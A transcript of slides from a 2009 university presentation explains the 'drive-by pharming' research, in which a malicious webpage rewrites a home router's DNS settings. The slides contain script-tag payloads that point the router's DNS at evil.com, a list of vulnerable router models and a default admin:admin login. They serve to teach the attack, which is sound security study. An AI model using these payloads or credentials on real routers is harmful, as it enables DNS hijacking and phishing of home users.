Post on 18-Dec-2015
transcript
DRIVE-BY PHARMING
S. Stamm, Z. Ramzan, and M. JakobssonPresented by Anh Le
Anh Le - UC Irvine - 2009
Authors
Sid Stamm- Indiana University- Google Intern
Dr. Zulfikar Ramzan- Technical Director ofSymantec Security
Prof. Markus Jacobsson- Indiana University- Principal Scientist at Palo Alto RC
Anh Le - UC Irvine - 2009
Outline
1. Introduction
2. Preliminaries and Previous Work
3. Drive-By Pharming
4. Demo
5. New Attacks and Recent Events
6. Conclusion and Discussion
Anh Le - UC Irvine - 2009
1. Introduction Motivation:
Total control of home broadband routers○ Phishing (by changing DNS setting)○ Botnets (by changing firmware)
How: Attacker sets up an “evil” webpage Victim visits the evil webpage Victim’s home router is compromised No physical proximity required
Enablers: JavaScript-enabled web browsers Default password management of the routers
Anh Le - UC Irvine - 2009
2a. Preliminaries
DNS:Domain Name System
What’s IP of yahoo.com?
yahoo.com’s IP is 206.190.60.37
ClientDNS server(home router)
Anh Le - UC Irvine - 2009
2a. Preliminaries (cont.)
Phishing:A type of social engineering attack to obtain
access credentials
Pharming:An attack aiming to redirect a website's
traffic to another bogus website
Anh Le - UC Irvine - 2009
2b. Previous Work
InternetInternet
Detecting … … Your internal subnet is10.0.0.0/24!
1. Internal Net Discovery [Kindermann 2003]• Java Applet
2. Host Scanning [Grossman 2006, SPI Labs 2006]• Java Script
• Fingerprint router using default password and image name
Detecting … … You have a Linksys router, and its IP is 10.0.0.1!
Anh Le - UC Irvine - 2009
Outline
1. Introduction
2. Preliminaries and Previous Work
3. Drive-By Pharming
4. Demo
5. New Attacks and Recent Events
6. Conclusion and Discussion
Anh Le - UC Irvine - 2009
3. Drive-By Pharming
InternetInternet
DNS SettingChanged!
Anh Le - UC Irvine - 2009
3. Drive-By Pharming
How is it possible?HTTP Get Configuration
Off-site script inclusion
How about password-protected?
http://10.0.0.1/apply.cgi?dns=new-dns-server.com
<script src=“http://10.0.0.1/apply.cgi?dns=evil.com”></script>
<script src=“http://usr:pwd@10.0.0.1/ apply.cgi?dns=evil.com”></script>
Anh Le - UC Irvine - 2009
3. Drive-By Pharming (cont.)
Assumptions:1. JavaScript-Enabled
Web Browser
2. Default Password Management
Vulnerable Routers: Netgear WGR614 D-Link DI-524 Linksys WRT54G Cisco 806, 826, … …
47.5%
47.5%
5.0%
American Web Users
JS + Password Password JS + Default Password No JS
Anh Le - UC Irvine - 2009
3. Drive-By Pharming (cont.) Verizon
[Modem + Router]MI424-WR
admin:admin
Anh Le - UC Irvine - 2009
4. Demo
Anh Le - UC Irvine - 2009
Outline
1. Introduction
2. Preliminaries and Previous Work
3. Drive-By Pharming
4. Demo
5. New Attacks and Recent Events
6. Conclusion and Discussion
Anh Le - UC Irvine - 2009
5. New Attacks and Recent Events New Attacks:
Growing Zombies/Botnets○ By installing evil firmware
Viral Spread○ Router auto-recruits routers
Recent Events: Kaminsky DNS Vulnerability (July 2008)
○ cache poisoning attacks on any nameserver! Router Botnets (March 2009!)
Anh Le - UC Irvine - 2009
5. Conclusion and Discussion
Routers with default password management are easily compromised
Browsers as conduits of attacks to internal network
Army of router botnets
Anh Le - UC Irvine - 2009